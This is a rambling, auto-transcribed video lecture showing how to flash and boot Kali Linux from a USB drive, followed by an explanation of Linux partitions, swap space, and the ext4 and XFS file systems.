Cali Linux image from the the device so technically you’re just literally going to be walking around with essentially a computer on a USB drive that’s kind of what it feels like right so you want to turn the USB drive into a bootable media and we’ll be doing that live as well and then we’re going to boot from the USB drive so when you actually go through this process uh this one is kind of uh fairly simple straightforward you’re just going to be going through the wizard itself there are a few elements that once I boot from the USB drive I’m going to be uh recording so I can show you what specific options you need to choose to make sure that it loads uh most likely in every case that I’ve gone through you need to get to the BIOS or UF settings which is the the very base settings of the computer so that it allows you to choose uh a boot from either the internal memory or from an external file and what we’re going to be doing is loading from an external file and then we have the Linux installation itself so this typically this is done uh using rofus Rufus or etcher but sometimes it’s actually also done uh from your computer when you’re going through the boot process where you would you do your Linux installation now if we’re running from a USB drive you don’t necessarily do any kind of a Linux installation it just loads from that USB drive so that that’s kind of one of those uh optional portions and same thing here this can this is most likely done in etcher or roof this and sometimes maybe it’ll be done while you’re booting from the computer where you you know choose your language and the location keyboard layout etc etc um then we have the external SSD portion of this where you choose this as the installation Target and again this is done through etcher or Rufus where you choose the external SSD which is when you choose the USB drive to uh be as your installation Target and then it’ll install the live version of Linux onto that external SSD and then you just go through the the Motions you may be prompted to set up a username and password if you aren’t the basic username and password is C Cali so C would be the username Cali would be the password and then once you’re logged in you can modify those and then you just start it you you restart the computer you boot into Linux uh from the external SSD from the file inside of the SSD and then from there you actually have your boot running and your operating system will load and you’ll be inside of Kelly Linux so this is what the step-by-step looks like so what I’m going to do now is I’m going to actually go through all of those steps and just show you what that looks like okay so this is my dis utility on Mac and so what we can see here is that I have my primary 2 tbte drive and I have the Linux drive that’s right here and then there’s actually a balena etcher uh dis image as well that’s been uh activated because that’s what we’re going to be using to do our installation of the Cali Linux ISO so in this particular case I’ve already formatted this drive I just want to show you what that process would look like so that you can make it uh usable by all of the operating systems so I’ve clicked on the actual drive itself up here I’m going to go through erase and then you know the name is fine it’s Linux the format is the big piece right here so MS DOS as you can imagine is Microsoft Mac OS extended and journaled these two are going to be Mac OS specific what we want to do is we want xat xat is the uh multi-os version of this where you can just make sure that this thing will run on uh essentially any operating system that it runs on now if your options for this formatting aren’t exactly the formatting that you see right here then just a simple Google search or conversation with Gemini or GPT will allow you to find the specific formatting option that will allow you to go through uh a boot from any kind of a machine Mac OS windows so on and so forth and then Security Options this portion is I’ve specifically actually had information that was on this drive previously so I left it at fastest because it would be possible to recover the data that was on this uh drive if I leave it as fast as because it’s not the most secure meaning it’s not going to wipe it and make it unrecoverable when you take it all the way to the end right here it makes it absolutely unrecoverable you won’t be able to take any data from it and it essentially overwrites the the drive with a multiple series of zeros and ones and literally just making it unrecoverable you won’t be able to boot anything from it so uh that one’s up to you if you’re getting a brand new drive it doesn’t really matter but if you’re wiping something that you previously had you might want to keep it so that you can potentially at some point reboot it and then once that’s once you’ve selected your options you just click erase right here and then it’ll just erase the whole thing and make it a brand new drive so that you can use it for your installation process and then this is what it’ll look like it’ll just be you know 1 tbyte free and then you have 12 megabytes that are still used which I presume would be all of that data that I previously erased that’s still kind of sitting somehow in storage back there so that’s pretty much it that’s all we got and then the dis itself the USB drive will actually be ready for installation using either Rufus or etcher and now that my drive is ready what I’m going to do is I’m going to choose the version of these isos that is most applicable to me and in this particular case it’s the live boot that’s available over here so it’s literally unaltered host system meaning your main computer won’t be changed in any way you get access to the hardware of the host system so if you have a 16 GB Ram the live boot will use the 16 GB RAM and then the customized Cali kernel of course performance decrease when heavy in andout is not a uh input output is what that essentially stands for um it won’t be affected in any way because again it just is doing a live boot from this piece and you’re using the main system so very quick very easy you get a full Cali installation or Linux installation and then you can do this with all of the different versions of Linux as well this is not limited just to Cali so you can run all of the other ones from a USB drive as well so I’m going to click uh the uh live Boot and then from here I’m going to pick 64bit because my machine is actually it can handle a 64-bit so I’m going to do 64-bit and from here on out I’m going to be using a Windows machine and I just have verified on there as well that it is all good and then the piece right here that you see that it says torrent and then the sum value this is the piece that you can verify what the hash of this particular ISO image is and for security purposes if you don’t get your ISO image from the Cali website directly if you get it from some kind of a torrent website you need to run the Sha 256 sum and find whether or not that value is exactly this value if the value has been altered even by one letter then don’t do it because the official installation shop 256 hash value is this which means that this is what C has actually confirmed therefore it’s something that you can trust right that’s essentially how I’m going to go about trying to explain this as best as I can the installation itself is 4.3 GB so we’re going to just click download and it’ll start to download right here for me and once that has has been downloaded we will go through etcher and we will install it on our USB drive okay so our ISO has officially downloaded and I have etcher open and as you can see it’s very very simple it’s not it’s not a complicated uh interface so what we’re going to do in this case we’re going to flash from the file the file that we’ve downloaded the iso image uh you can also Flash from a URL or you can clone a specific Drive that you have so I’m just going to do flash from file and then from here I have to choose the iso image and in this particular case it’s literally right here in my uh Cali Linux in my downloads folder so I’m just going to click that ISO image it has the iso at the end of it we’re going to click open and then we’re going to select the target onto which we want to write this specific thing and in this case I have my Cate beup slim BK this is the one with the one terab that’s the one that I know that I want there’s the Apple SSD and all these various things I don’t want to mess with these in any way this is the one that I want which is the one TB Drive uh the CATE 2 uh portable media the 2 terb drive that’s the one that I uh don’t want to mess with now there is a way that we can just make sure which one these are cuz I’ve actually renamed these and I’m not seeing the renamed version of this so there’s a way that I can find out which Drive it is that has been assigned to dis 5 and dis 4 Etc and we’re going to do that inside of our terminal okay I have loaded my terminal very very simply um the command itself is very simple so it’s disk util for the dis utility and we’re just going to do list and you press enter and it brings up a bunch of data um including all of these partitioned drives that we have over here and these partition drives should actually have their name that we’ve assigned to them as well so in my particular case we already saw on uh the eter that we had Dev dis 4 and Dev disk 5 were the two drives that it uh noticed that it said it has a lot of information or a lot of por a lot of the size data storage data on it um the 2 tbte one is the one that is named right here which is the primary 2 terb that’s the actual name that I gave it not the name that it came pre-installed with inside of the uh when like when I bought the CATE drive that those are the names are the ones that you see like those original names is what we see uh the next one is the one that I’ve named Linux and that’s the drive that I’m most interested in and we can see that it has the 1 tab size and the availability in this particular case we have the two terab size but the availability is not that much cuz I’ve St I’ve stored so much data on it um so it’s not really that good as far as the availabilities of us concerned I definitely want this one that I named Linux and I can see that it is inside of the dev dis 5 partition right here so that’s what is most interesting to me and most useful to me so now I’ve confirmed that data I’ve confirmed that information I know that I want the drive that’s on dev disk 5 so I can continue with my installation on etcher and here it is I already had it installed cuz that’s pretty much what I figured because I knew it was the one TB drive so this is it the seate buff Slim K media etc etc I’m going to select this one as my drive and that’s it once that’s done you just click Flash and it says hey you’re about to erase an unusually large Drive do you are you sure that you don’t want uh are you sure that the selected drive is not a storage drive and I’m just going to say yes I’m sure because what I know is that I can go ahead and uh use that as a storage drive when I do launch Cali Linux uh in front of my or from my other computer you will also get notified to enter your password because it is a privileged access type of a uh thing that it needs to run so uh I haven’t pressed enter so it actually stopped but uh we’re going to retry this one more time because I just want to make sure that uh I do run it correctly so we’re going to run it all over again and I’m just going to enter my password at the very end real quick just to give it permission to do what it needs to do and then it’ll it’ll create the drive for us okay so there you go the password went through I got a permission request for eter to uh access this particular drive and I gave it the request and you can see it’s working and it works very quickly cuz it’s not a massive ISO image or anything like that so it’s going to take maybe another 30 seconds or so and then the installation of Cali Linux will be done on this external USB drive and then we can go ahead and boot it and talk about the rest of the stuff about partitions and package managers so on and so forth all right so when I reboot my computer and I just keep pressing F12 this is on a Windows machine it’ll take me to the boot menu and then when I get to the boot menu uh the option that I want is to actually get to the boot screen which is F9 for me and then I choose a live boot from a file and then I choose the Cali image that I had and then I go to EFI and then I go to boot and then I choose the uh 6 4bit version of it and then this is what we land on this is the actual menu for Cali from uh any kind of a USB drive or even a CD ROM if you actually had a CD ROM and then you see that we have all these options to boot from live from the USB itself and then we have the installation portion and what I’m going to do for this section is I’m going to boot it from the uh the USB live image and we’re going to boot it with USB persistence and as soon as you pick that image it basically brings you to the the loading screen here so uh it usually takes about maybe like 20 to 30 seconds for this to actually load and then when it loads we have the operating system running ready to go with all of the utilities installed and uh essentially that’s it so it’s that quick to just boot from a USB drive uh without going through the full installation process so you’ll see here in a couple of seconds that it’ll actually load and I have to actually record the screen with myself cell phone so that’s why the image quality is like this but when we start doing the screen capture once we’re inside of uh the Cali Linux machine it’s going to be much clearer and you’ll be able to see everything as I click around and here we have it this is literally the the operating system loaded ready to go we have of course the file system with all of the uh system binaries and everything like that you can open up a terminal and have that run very quickly and smoothly and I uh all of the utilities for the most part like 9 % of the utilities are already pre-installed and then if you wanted to go to your home as the user you would access it through the file system if you went through the menu you will get access to all of the utilities and the shortcuts that are available so it’s a fully functional operating system that’s available so what I’m going to do right now is I’m going to restart it and uh it’ll take me back to the very beginning of the uh computer’s boot process and then we’ll do F12 again so that we actually can get to the boot menu and then once we are inside of the boot menu we’re going to repeat the same process that we did before uh meaning we are going to go and actually uh do the boot menu Itself by F9 then we’re going to boot from a file we’re going to choose our Cali live image and then I’m going to go to the EFI option and go to boot again and then choose the 64-bit version again but this time around when we actually get to the menu here I’m going to actually click the install installation uh option so that we can go through a full install so you can actually see what it’s like to go through the installation process with Cali Linux Wizard and uh how to select your partitions and so on and so forth so pretty much just like every other operating system when you boot it for the first time it’ll ask you your preferences so your language and your country and uh I guess the version of English for me and then I’m going to just keep pressing next until it gets me to the port where I have to choose my partitions um and essentially it’s going to ask me how I want to split the memory storage of the computer that I’m on cuz I’m using a technically a type 2 hypervisor because this is being booted from my Windows machine so my Windows machine the operating system of the windows is going to be the primary portion of the the operating system and we’re running Cali Linux as an extra installation and so the main Hardware of the Windows machine is going to act as the basis for this and then we have the uh Windows machine itself and then this is going to be our dual boot option where we can if we uh whenever we restart this and we get to the boot menu we can actually choose to boot Cali Linux instead of booting the uh the Windows machine so actually technically I think this is a type one hypervisor because we’re booting live from the hard drive we’re not booting on top of the actual Windows operating system so I won’t go inside of the Windows operating system so you can see I’m I’m setting up my username here and I’m setting up a password for my installation all of these things are very very intuitive and very easy to follow the instructions and I do stand correct it so the once this installation would be finished this would actually be our dual boot option where we are running Cali on top of the hardware of my computer instead of running it on top of the window Windows OS so meaning you would log into Windows OS and then you would use some kind of a hypervisor to launch Cali Linux instead of doing that we’re booting it live from the windows OS and this is the portion that we get into where we do the selection for how we want to create our partitions and so um it essentially just gives the the recommended option if you don’t know what you’re doing you can just follow along with the options that it gives you and it creates the most basic uh partition split apart for your root directory your users home directories and all of the other primary and extended partitions that would be necessary to boot uh Cali Linux and I’m using the external drive that you can see right here it has about a terabyte of uh storage that would be used for my partitioning file system and then that’s what I’m going to use to create the rest of this uh the browser or not the browser the wizard and then it’s going to be a guided process and everything else would after that once you press accept and then you press enter it’s going to start creating the partitions and then it’s going to actually take you into the boot menu very similar to what we had from the live uh version you would restart the system and then you would select your Cali Linux installation uh Cali Linux operating system and then it would just load Cali Linux and it would look exactly what it looked like from the live boot that we did from the USB drive except that time around you would be running it directly on top of your Hardware so I’m restarting my computer and then we’re going to get back to the presentation all right let’s talk about managing partitions file systems and dis usage here are some important partitioning Concepts to consider and to keep in mind so the role of partitions in isolating systems or user data is mainly to uh preserve space uh on a physical storage device so if you can think of partitions as logical divisions of a physical storage device allowing the operating system to manage the data in separate isolated areas on the same device they’re key in organizing the data and helping with performance security and manageability and the the visual is really the big thing that I kind of wanted you to wrap your head around I work well with visuals and I feel like you may also get value from this as well so if we look at this left portion right here let’s say you have two physical storage devices right so you have piece one and piece two and piece two has been broken down into three separate pieces right here you can consider that to be partitioning and so this can be actual physical storage or it could be one of the primary partitions as we’ll talk about in the next slide it could be one of the primary partitions that has been broken down into multiple pieces but to really just kind of wrap your head around what partitioning is kind of like the name implies itself you’re breaking storage space down into parts so it could be the actual physical storage space so you could have one physical storage device that’s on your uh computer so whether it’s a server or it could be your laptop or uh the Cali Linux machine uh or really anything on a USB drive or something like that you could have an external storage device that you’ve plugged into your computer that could be the physical storage device and as you go through booting and setting up your your computer so let’s say you’re installing Linux on one of your storage devices or as a virtual computer or a virtual machine and you as you go through the installation it asks you for the drive to use for partitioning and then you select your external external drive to be your partitioning storage or your storage device that you will partition and then from there it’ll just go through its various uh options and it’ll guide you through it or you can manually select how you want to do it like we did in the the installation video or the installation portion of this video right so that’s essentially what partitioning itself is right so when you think about the uh advantages that comes along with partitioning uh there are three-fold and this is just kind of a general approach to it so the isolation of data right so they keep system files separate from user data reducing the risk of user data corrupting or the corruption of user data in the event of any kind of a system failure right so you keep system data as well as user data separate from each other you isolate those data types from each other so that in case anything happens one or the other won’t affect the other right and then you have the performance of it so when you separate frequently access files such as the stuff that’s inside the V VAR directory the variable directory from system critical files that can uh improve the performance of the machine right so frequently accessed files um can be logs they can be dynamic data email spools whatever it may be those things if they’re kept separate from the system critical files then it can actually help perform help the performance of your device it can make it run smoother and faster and then you have security and recovery and this is a really big one especially for our world on this channel we’re going to be we talk about security all the time and you’re probably going to be in incident response at some point and uh having backups and securing The crucial data is very very important so when you isolate system files inside of a partition separate from user files it makes it easier to manage the permissions and restrict access to those system files right here and it enables quicker recovery in the event of data corruption or system failure so these are some of the key advantages of going through partitioning now here are the examples of the common primary partitions most Linux devices break down to at Max four primary partitions one of the biggest and most important one is the root partition so this would be the main directory where everything is installed including the home partition and the VAR partition and everything else right it is an extension of the root partition and keep that word extension in mind so you have the root partition the home partition and the VAR partition these are typically the most common partitions and when you go through the installation of any Linux uh device you will see that as your options right you can say that you know use one specific location use that as the main partition or break it down into these three common partitions and then the swap space is a separate partition for managing memory overflow and we’ll talk about what that is in a little bit but these are the most common partitions and in a lot of cases these are also the primary partitions so this is what we’re going to be talking about right now so the primary partitions are the main partitions that can be directly used to boot the operating system so for example the root partition The Root Drive that forward slash that represents root that is a primary or I would say the primary partition the limitations um have to do with the traditional partitioning scheme that actually allow a maximum of four primary partitions per hard drive now it’s common to use primary partitions for the main operating system and important system data and then have your extensions and logical partitions go for other types of data so the root so if we go back to this real quick this is the main directory where everything of the OS is installed the home is the storing of the user specific file so for example the variety of different users if you have five users inside of the home directory here you will have five separate folders or five separate directories for each one of those users and typically it’s the username that’s assigned for each one of those directory and then you have the VAR partition which is isolating the frequently changing files like the logs that can grow ins size over time and then you’ll need to wipe them eventually to help preserve space on the overall storage of the computer right so if you’re computer has I don’t know let’s say one terabyte of storage then this specific thing will take up a lot of space because if you don’t have proper scheduling of the backups and the wipes so that you can transfer it from that main terabyte of storage into another uh storage device this can overflow very quickly and it can take up a bulk of your uh one tbte right so these are the the primary partition types now what happens is that you have these primary partitions so these are the actual primary partitions uh more often than not the root is uh I mean I would say 100% of the time the root is the primary uh system partition it’s the main partition where the Linux operating system is installed it contains all the system files the libraries binaries and everything else so we talked about those uh when we looked at the file system earlier we were talking about all of those extensions of the the root partition and that’s where all of these system uh files are uh considered to be installed and so the you know we talked about the library and the binaries and the system binaries and the the temp log and all of that stuff or the temp folder and all of these various other uh partitions or extensions of the root partition then you have the boot partition uh which contains the boot loader the kernel other files needed to boot the Linux system it’s usually a small partition and around 500 megabytes to 1 GB because it doesn’t require a lot of data space to run the to you know store the kernel and the bootloader and all those things but this is also a main primary partition because without this the system won’t be able to boot it won’t be able to start and then you have the home partition which is also another one of those primary partitions um and these are the three that have to do with the variety types of data that are stored uh let’s say permanently on the machine and then you have the swap partition that uh deal deals with the random access memory it deals with the the temporary uh data and the processing power of the machine that you’re using so it’s used as virtual memory when the physical RAM of the computer is maxed out and you need a place to uh store some of the virtual or uh the volatile uh data points that need to be stored temporarily until you don’t need them anymore and so the swap partition deals with the random access memory or data that’s similar to the stuff that’s on random access memory which is considered to be volatile data that just is uh is also uh considered to be dynamic data that goes in and out and you use it uh more in like a live environment and then typically when the system reboots and when it restarts uh this whole thing is reset and you don’t have to worry about this stuff anymore um we don’t consider hibernation to be a part of system Reboot system reboot is when the computer is actually restarted or the systems actually restarted hibernation is just when it goes to sleep and then you need to recover all of the data that that was inside of the ram inside of the hibernation file as well as the swap partition to pick up where you left off so these more so are permanent partitions with stored data that you can access after reboot after reboot after reboot and then this is volatile data that typically is reset and wiped every time you reboot the computer and of course hibernation does not count as a reboot when a computer goes to sleep it does not count as a reboot so these are our primary partitions and then we have the extended partitions so an extended partition is a container for additional logical partition so the extended partition is not the actual Storehouse of the data it’s a container for other logical partitions so it helps to bypass the four partition limit that’s dedicating one primary partition as an extended partition which typically is the root uh partition so The Root Drive the root partition ends up being that one primary partition that becomes the extended partition and then within the root drive you end up having all of these other logical partition so for example the forward SL TMP and the forward slash uh Dev and forward slash everything else that falls under a logical partition so the primary partition gets extended right so primary partitions can and often do act as extended partitions however there’s only one extended partition that can be created on a physical drive but it can contain numerous logical partitions so that means you can literally have essentially as many as you need uh within that one primary partition that has been extended so the extended partitions are commonly used on systems that need more than four partitions without using newer partitioning schemes like the GPT partitioning scheme so we’re talking about a lot of the traditional Linux which in in the modern world it’s still being used so uh it’s you’re going to most likely run across the primary or the the the we can call it the Legacy the original uh partitioning scheme that has the four primary and then within that one primary which is the root there’s a bunch of other logical partitions and you’re going to run across that a lot and you’re going to know need to know that uh as a job for a Linux administrator and then when you deal with a GPT partitioning scheme it’s just easier to deal with it uh simply because the fact that allows you to have more than four primary partitions and then you can uh Storehouse or compartmentalize your data easier so these are some extended examples so the SLV VAR log or the VAR folder this can actually be a primary partition when you’re doing your uh installation of Linux but you can also just have it be one of the logical partitions so it can be the extension of the root right so it’s the root is represented by this for slash D VAR right here would be the extension and then inside of this you’ll have the VAR log and then the VAR email or VAR whatever and you’ll have a bunch of other logical containers that will have a variety of different types of data so for example log files and databases email schools and any other Dynamic content that is being frequently used or updated so it helps manage large amounts of data that change frequently so this is one of the very common uh extended partitions which could also be considered a logical partition and then you have the for sltm the temporary files so this is also another extension of the root partition and it holds temporary files right um then you have the for slev which is a logical partition for development work or it can be the other um we can call them virtualized uh portions of your machine so this is another extension of the root partition that can act as a logical partition as well so essentially what you’re doing is you are extending the root drive and then Within These folders you will have a variety of other folders that will act as The Logical partitions that are stored inside of these extended partitions so hopefully that’s making sense a little bit and finally we have the logical partition so these are the subdivisions within an extended partition right so you can have the within the home directory within the home extended partition you can have a bunch of user partitions a bunch of user folders and all of those user folders end up being the logical partitions within the VAR directory you can have the slail SL log SL Etc and you can have a bunch of other uh folders or directories that act as the subdivisions of that specific directory and that ends up being the uh the uh logical extension The Logical partition of this extended partition so hopefully that makes sense so just going back to this image right here just to kind of give you another visual uh with the example of extended and primary and logical partition so if these two for example our are our primary partitions and then within this primary partition we have these extended partitions and then this one could be the VAR partition this one could be the Dev partition and this one could be the TMP partition or the home partition for example so these could act as anything right and so if you want to expand on this so if we bring this one right here and this ends up being the VAR partition now over here which ends up being our extended partition and within this VAR partition we would have the log and then the email and whatever else it would be that’s how it breaks down right so you have have the primary that gets broken down into these extensions and then these extensions can come and then one extension could be broken down into multiple logical partitions so that’s really how the whole thing ends up breaking down and you it’s essentially just a way to organize your data and to compartmentalize data so you can as uh the benefits that we talked about earlier you can just have better uh access to these things and you make sure that the it performs better on the actual system and in case there’s any security or backup issues you’ll be able to compartmentalize and uh access certain points uh much easier and if one thing crashes it doesn’t affect everything else so on and so forth so uh partitioning uh serves multiple purposes and it’s it’s fairly a simple concept once you kind of really get a chance to wrap your head around it you have four primary partitions within those primary partitions one of them we can be turned into an extended partition so from that root we can have multiple extensions and then each one of those extensions inside of it is going to have a variety of different uh partitions that will be the logical so there is four primaries one of those primaries is going to turn into a an extended where you can have multiple extensions inside of it and within each one of those extensions those extensions end up being containers for all of the other logical partitions right so you can think of partitions also as containers if it helps you and that’s essentially that’s what that’s all that partitioning is when you just want to understand the concept of partitioning and to give you a few examples uh as far as the the way that the file system looks so let’s say that you have the extended partition which is Dev sda4 right so this is the extended partition that’s on your disk and this is part itself doesn’t store any data directly but it actually has a contain it becomes a container for other logical partition So within this partition you can have multiple logical partitions that serve various purposes so for example within Dev SDA 4 we can have Dev SDA 5 which is allocated to data right so uh this is done inside of either the partitioning uh process as you’re doing your installation or it’s done inside of the uh the configuration file that is stored inside of our Etsy directory and within that configuration file we can make all of these assignments of these partitions and we’ll we’ll talk about that in a little bit so this logical partition is created within the extended of sda4 it’s assigned to the Mount point of data meaning that when you access data in your file system you’re actually accessing this specific logical partition that is housing all of the data inside of that it kind of seems a little bit confusing but uh if you can just wrap your head around it you’ll you’ll see what it means and I’ll show you what the tree structure of it actually looks like and how these things are connected so you have that visual as well but it’s typically uh used for storing user data documents media files Etc so that’s what the for slash dat uh file is or folder with the forward SL data folder that’s what it houses is the user data document so on and so forth and it gets mount right so it gets mounted onto this logical partition that is sitting inside of that extended partition so we can also have SDA 7 that is inside of the SDA uh 4 right so SDA 5 would be in there uh SDA 7 I think it was supposed to be SDA 6 or something and I accidentally clicked seven but it’s allocated to backup right so this is the third logical partition within this specific extension and it’s assigned to the Mount Point backup which is USIC specifically for storing backup files and system snapshots and it helps in organizing backup data separately from other system and user data and then we this is our tree visual of this so this would be our extended partition and then within this extended partition you have these multiple logical partitions and this one is mounted at data this one is mounted at the VAR uh folder and this one is mounted as the backup folder okay so you don’t need to go a really deep into this it’s beyond the scope of what’s covered inside Linux plus but you just need to understand the difference between primary extended and logical partitioning so that as you are asked questions or you uh are looking at uh potential examples you can differentiate between these various partition types A final note on this during installation uh the wizard will guide you through the partitioning and will ask you how you want to partition your hard disk even if you boot from a USB drive as a live boot you can still choose USB persistence and maintain your partitioning options and in this case you’ll likely have to manually edit your partitions uh you’ll create the partitions using the Fisk or the CF disk command and then from there you’ll Mount each of the new partitions inside of the Etsy FS tab configuration file and that’s essentially how it looks like um so the this portion of it uh I don’t know if this will be right before we go through the actual uh wizard for the installation of Linux or this portion of the lecture will be after we’ve gone through it but either before this you will have seen this entire concept or after this you will see the entire concept I’m not sure exactly how I’m going to end up uh putting the edit together but for sure you will see this uh this example of how this partitioning is actually done especially with the installation of the wizard in 99% of environments there’s going going to be a wizard that will guide you through the partitioning and will do all of these things for you so if you want to boot uh from a USB you’ll need to know how to uh configure the FST tab configuration file but more often than not you’re not going to need to worry about that because if you’re booting from a USB you’re only using it for its uh capabilities and not as a storage device and that is a completely different situation and it again it’s beyond the scope of of this particular uh training Series so that’s essentially uh how you can ensure that your partitions are run and configured during installation and uh you will have either definitely seen that prior to this or you will see this right after this right after a piece swap space uh is something that uh is disk space that’s designated to act as the Overflow for the system Ram so when the physical RAM on on your system is exhausted the system uses this swap space to temporarily hold inactive memory Pages allowing active processes to continue without crashing so let’s say you have a bunch of uh software open and a lot of them aren’t currently actually being used so what’s going to happen is that those memory pages are going to be stored in the swap space and your physical RAM is going to be dedicated towards anything that you’re actively using and and if that ends up being uh too much so if your swap space ends up getting overflowed as well as your physical RAM that’s when you start seeing the system you know uh slow down drastically and then sometimes you even see a system crash because you’re really overclocking the processing power of your computer and at that point uh it just can’t handle everything that you’re throwing at it but more often than not what happens when your physical RAM is maxed out uh it just sends everything that’s temporarily inactive so it could just be something that is minimized on your computer or uh a document or something that you’re just not using those end up going in the inactive memory pages but you can quickly call on them to bring them back to the Forefront and then once they come back to the Forefront they go from the swap space and they start using the physical RAM so the swap space is for inactive memory pages so just keep that in mind and uh that’s how it alternates back and forth between the physical Rams processing and what is being done in the background so to speak the inactive memory pages that are running in the background by doing that swap space uh extends your memory’s capacity so uh when the system hangs uh because memory demand exceeds what’s available on your physical RAM the swap space acts as a buffer to prevent crashes of the system um it takes a lot especially in modern computers cuz modern Computing is strong enough that you really don’t go uh into a system crash unless you’re really just you haven’t done a reboot in a like in years and your computer has a million different tabs open and a bunch of different software open you typically don’t see I haven’t seen a system crash on my computers in a very very long time because the swap space along with the the ram that I’ve chosen works very well and I I just like using computers or buying computers that have a a lot of physical RAM because I wanted to run fast and you know I do video editing and I do gaming and all these things and you just want a good computer that has a lot of physical RAM and the cpu’s uh gigahertz uh the hert power of the the CPU also contributes to the processing power of this so if you have a really strong CPU as well as a lot of gigabytes of RAM you’re not going to worry about this kind of crash or anything but in the event that you’re dealing with a computer that is mainly just for Linux and uh data processing it’s acting as a database and uh it can’t handle a lot of the workflow that’s being thrown at it for whatever reason uh then the swap space will kick in and it will help alleviate alleviate some of the pressure that’s being put on the physical RAM so that there is no crash that happens so it will extend the memory capacity of the physical computer and then it also facilitates hibernation so we already kind of touched on this a little bit but it’s also required for the syst system going to sleep right so when the system goes to sleep there’s a lot of stuff that uh is inactive at that point and a lot of those things go inside of those inactive Pages the data Pages memory pages that we refer to and those things are just stored in the background and when the computer uh wakes back up or it comes out of hibernation all of that stuff is recalled from the swap space so your computer can pick up where it left off and that’s another one of those things that’s really really powerful especially if like for example when you have a laptop and you don’t actually turn off the laptop you just close the screen like you pull the screen down that’s going into hibernation and when you lift the screen back up you literally are waking it up and it’s pulling all of its data from it swap space and this applies to both Linux and Windows and Mac OS so swap space is not something that is just uh uh inherent to Linux right so it applies to everything they may have different names for it or titling for it but this concept applies to everything so it’s it’s just an extension of the physical RAM capacity to make sure that the ram itself is actually all good and the computer runs smoothly and in case the computer goes to sleep you want to pick up where you left back up so it recalls all of the data and all of the the processes that were active and then went to sleep and now you need to reuse them again now some general commands that we need to just keep in mind these are very important uh partitioning commands to create a partition you can do it with either the Fisk command or the parted command and it will’ll talk about those in a little bit in depth um but these are all pseudo commands so it does require some kind of a root permission or at least for the user to be on the pseudo list but you do pseudo Fisk Dev SDA and it creates or modifies or deletes some kind of a partition in this particular case and then parted is another one of those things that in this part in with this specific command it’s creating primary partition with parted and it’s using the format of the ext4 and it’s giving it a 1 Megabyte to 512 megabyte capacity so uh these are just examples of part we’re going to go uh further in depth into uh Fisk and parted in a few slides but these are just uh some sample commands of what it looks like to create a partition or to be able to modify a partition with either parted or Fisk and parted also has a graphical user version of it that is outside of the command line that’s very very intuitive and you can use it with just point and click and it’s very easy so if you’re not using just a Linux uh command line type of a computer and you actually have access to a graphic user interface more often than not you’ll end up using gparted which is the graphic user uh version of this so uh these are just some sample commands of what it looks like to create a partition these are these sample commands to view your current partition so lsblk uh lists the block devices and the partitions that are associated with them and an Fisk L will list all the partitions and their details so these are some ways that you can view your current partitions and the how much storage they’re using and what they’re assigned to so on and so forth so these are things for viewing partitions and then these are some sample commands for dealing with swap space and managing your swap so MK swap swap on and swap off swap on and swap off are fairly intuitive you can kind of tell what they do from just their name but MK swap makes a swap space at this particular location so it in initialize a partition for use as a swap and then swap on activates a specific swap file all right now we need to look at file systems from the perspective of uh partitioning and this is uh another review of what we talked about earlier earlier we were just talking about file file systems in the context of file systems and where things are located how things are broken down now we’re going to be looking at it from the perspective of partitioning so the ext4 xt4 uh is the fourth extended file system so it’s the the most recent version of ex2 EX EX3 Etc and it’s the default in most Linux distributions it’s very reliable it supports large files and journaling uh the file system is one of the most widely used in Linux typically set as the default in many distributions like ubun 2 and davan and Cali Linux is technically an obuntu distribution and so it runs with the xt4 as well uh it builds upon the previous versions which is 2 and three and it has enhanced reliability speed support for large files etc etc so ext4 is most likely what is going to be run in a lot of desktop platforms if you’re going to be doing uh system advance Administration for Linux on desktops these are the key features of ext4 we’ve already talked about this so I’m not going to spend too much time on this slide but it provides for journaling which helps protect data Integrity um it records changes before they’re applied to the main file system making recovery easier um it provides large files uh or supports large files uh it has backward comp compatibility meaning that it can actually work with EXT2 and ext3 allowing users to mount and use those specific file systems without reformatting which is actually very convenient and has delayed allocation and extent so what that means is that it improves the dis input output performance by reducing the fragmentation the breaking down of data and better managing storage space so it’s as uh the the expected uh performance is it should be the better version of EXT2 and ext3 allowing for better performance the better management of storage so on and so forth so xt4 the most commonly used and it does journaling large file support backward compatibility with the other versions and delayed allocation and extension so that you can uh better manage your storage space and better manage your actual input output performance so the input of your uh requests and calls into the system and the output from the system to uh reply to your calls and Grant the requests that you’re making the typical use cases for xt4 uh is as we mentioned desktop systems personal laptops general purpose servers uh it’s because of the fact that it’s most commonly used and it’s one of the most uh versatile it’s used in a lot of common use cases and it’s a good option for people who prioritize data integrity and who may need backward compatibility with older types of file systems so this is for the personal computer uh you know desktop system general purpose server so on and so forth that’s what xt4 is great for and more often than not as a beginner Linux administrator you’re not going to be ma dealing with massive data centers and things like that so you’re going to be dealing with xt4 file systems more often than not as a beginner Linux administrator if you wanted to make an xt4 file system you just run pseudo M mkfs so make file system. xt4 to just make sure that it’s creating an xt4 file system and then you give it the mount point that you wanted to make the file system on and then check or repair that would be FS check file system check. xt4 and then give it the mount point that it was already installed on so these are some ways that you can create one and check or repair the status of that specific file system and then we have xfs the xfs file system uh it’s for performance and scalability it’s a very popular choice in Enterprise environment so this is where you actually go into Data Centers and high performance 64-bit file systems um that’s for Speed and scalability so it’s used in Enterprise environments meaning handling a lot of users most likely or scenarios where High data throughput throughput is critical um it was originally developed by silicon Graphics so it’s become a popular choice in Linux dros like Cent OS and red hat Enterprise Linux which are the Enterprise uh choices for Linux right so this is scalable this is the big the notable factor or the notable characteristics of xfs is that it’s fast and it’s scalable so that you can have a large environment with a lot of users or a lot of computers uh that use its data so high data throughput means that it use it provides data access to data it processes data very quickly compared to the xt4 right so this is designed for big environments the key features is that it has efficient metadata man management so uh handling metadata heavy workloads which is basically for uh requesting or requiring frequent file creation deletion or renaming and this doesn’t seem like a big deal but when you have a thousand users that’s kind of a big deal right so a lot of users going to be creating data renaming data points or re renaming files creating files deleting files and that process by itself just needs to be done quickly when you have a lot of users journaling a very similar concept you’re going to be hearing about this a lot it’s done a lot in uh the all of the different file systems that you’re going to be dealing with more often than not are going to have journaling just in case there’s some kind of a crash and you don’t want to lose data uh it is scalable so and lot large file systems making it suitable for system handling large data sets and high performance workloads which means if you have a lot of employees if you have a lot of lot of computers or servers it’s a really really good file system for that and of course it can resize file systems without requiring them to be unmounted providing flexibility in storage management which is again something that’s very important in data servers or in data centers so that they can uh work with the data without unmounting it and for somebody stopping the use of it you know what I mean so you need to be able to uh allow your employees and your users to still access that data so you don’t unmount the data and you can still allocate various uh uh dynamic or do Dynamic allocation which is essentially the name um that can help you just resize the file system so resize the potential allocation of that specific file system for this one computer or for this data center to make sure that yada yada yada I I feel like you get it 